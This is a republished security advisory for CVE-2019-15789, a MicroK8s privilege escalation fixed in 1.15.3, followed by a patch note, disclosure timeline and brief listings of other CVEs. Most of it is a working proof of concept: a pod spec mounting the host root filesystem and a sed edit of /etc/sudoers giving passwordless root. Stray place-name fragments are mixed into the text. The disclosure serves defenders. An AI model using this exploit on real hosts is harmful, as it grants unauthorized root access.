Privilege escalation vulnerability in MicroK8s allows a low privilege user with local access to obtain root access to the host by provisioning a privileged container. Fixed in MicroK8s 1.15.3.

As Samū‘ Overview :
Privilege escalation vulnerability in MicroK8s allows a low privilege user with local access to obtain root access to the host by provisioning a privileged container. Fixed in MicroK8s 1.15.3.

MICROK8S – PRIVILEGE ESCALATION (CVE-2019-15789)

Sep 10 2019

MicroK8s prior to v1.15.3 included a privilege escalation vulnerability, allowing a low privilege user to obtain root access to the host. MicroK8s allowed any user with access to the host to deploy a pod to the underlying Kubernetes installation. This allowed an attacker with local access to provision a privileged container and gain root access to the underlying host.

Bandar-e Būshehr Date Released: 10/09/2019
Author: Denis Andzakovic
Project Website: https://microk8s.io/
Affected Software: MicroK8s <= v1.15.2
CVE: CVE-2019-15789

PROOF-OF-CONCEPT EXPLOIT

As low privileged users were allowed to configure the running cluster and containers therein, a malicious user could spawn a pod with complete access to the root file system, edit /etc/sudoers and escalate to root.

doi@microk8:~$ cat pod.yaml
apiVersion: v1
kind: Pod
metadata:
  name: hostmount
spec:
  containers:
  - name: shell
    image: ubuntu:latest
    command:
      - "bin/bash"
      - "-c"
      - "sleep 10000"
    volumeMounts:
      - name: root
        mountPath: /opt/root
  volumes:
  - name: root
    hostPath:
      path: /
      type: Directory
doi@microk8:~$ microk8s.kubectl apply -f pod.yaml
pod/hostmount created
doi@microk8:~$ microk8s.kubectl exec -it hostmount /bin/bash
root@hostmount:/# cd /opt/
root@hostmount:/opt# cd root/
root@hostmount:/opt/root# ls
bin   dev  home        initrd.img.old  lib64       media  opt   root  sbin  srv       sys  usr  vmlinuz
boot  etc  initrd.img  lib             lost+found  mnt    proc  run   snap  swap.img  tmp  var  vmlinuz.old
root@hostmount:/opt/root# cd etc/
root@hostmount:/opt/root/etc# sed -i 's/ALL$/NOPASSWD: ALL/g' sudoers
root@hostmount:/opt/root/etc# cat sudoers
{...snip...}
# User privilege specification
root    ALL=(ALL:ALL) NOPASSWD: ALL

# Members of the admin group may gain root privileges
%admin ALL=(ALL) NOPASSWD: ALL

# Allow members of group sudo to execute any command
%sudo   ALL=(ALL:ALL) NOPASSWD: ALL
{...snip...}
root@hostmount:/opt/root/etc# exit
exit
doi@microk8:~$ sudo su -
root@microk8:~# id
uid=0(root) gid=0(root) groups=0(root)

The above could also be trivially achieved with a privileged container, though MicroK8s disables privileged containers by default. Note: privileged containers are enabled when Istio is installed.

PATCH

The MicroK8s team addressed this vulnerability in v1.15.3 by requiring any access to the Kubernetes installation to be performed by a privileged user (eg, through sudo or by adding the user to the microk8s group).

TIMELINE

12/06/2019 – Advisory sent to Ubuntu security mailing list.
14/06/2019 – Advisory receipt acknowledged.
16/07/2019 – Update requested.
17/07/2019 – Report confirmed by the Ubuntu team.
15/08/2019 – Update requested.
15/08/2019 – Ubuntu referenced an open pull request, introducing the a requirement for all MicroK8s actions to be performed via sudo.
06/09/2019 – v1.15.3 snap added to stable.
10/09/2019 – Advisory released.

CVE-2019-15789

Description
MicroK8s prior to v1.15.3 included a privilege escalation vulnerability,
allowing a low privilege user to obtain root access to the host. MicroK8s
allowed any user with access to the host to administer the underlying
Kubernetes installation, including deploy pods. This allowed an attacker
with local access to provision a privileged container and gain root access
to the underlying host.
References
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15789
https://pulsesecurity.co.nz/advisories/microk8s-privilege-escalation
https://discuss.kubernetes.io/t/explicit-use-of-sudo-in-microk8s-cli/7605

Common Vulnerabilityies and Exposures

Contact us to get started

CVE-2024-37079 : VMWARE VCENTER SERVER/CLOUD FOUNDATION DCERPC HEP-BASED OVERFLOW

CVE-2024-37079 : VMWARE VCENTER SERVER/CLOUD FOUNDATION DCERPC HEP-BASED OVERFLOW

Description vCenter Server contains a heap-overflow vulnerability in the implementation of the DCERPC protocol. A malicious actor with network access

CVE-2024-5469 : GITLAB COMMUNITY EDITION/ENTERPRISE EDITION UP TO 16.10.5/16.11.2 KAS RESOURCE CONSUMPTION

CVE-2024-5469 : GITLAB COMMUNITY EDITION/ENTERPRISE EDITION UP TO 16.10.5/16.11.2 KAS RESOURCE CONSUMPTION

Description DoS in KAS in GitLab CE/EE affecting all versions from 16.10.0 prior to 16.10.6 and 16.11.0 prior to 16.11.3

CVE-2024-27172 : TOSHIBA TEC E-STUDIO MULTI-FUNCTION PERIPHERAL OS COMMAND INJECTION

CVE-2024-27172 : TOSHIBA TEC E-STUDIO MULTI-FUNCTION PERIPHERAL OS COMMAND INJECTION

Description Remote Command program allows an attacker to get Remote Code Execution. As for the affected products/models/versions, see the reference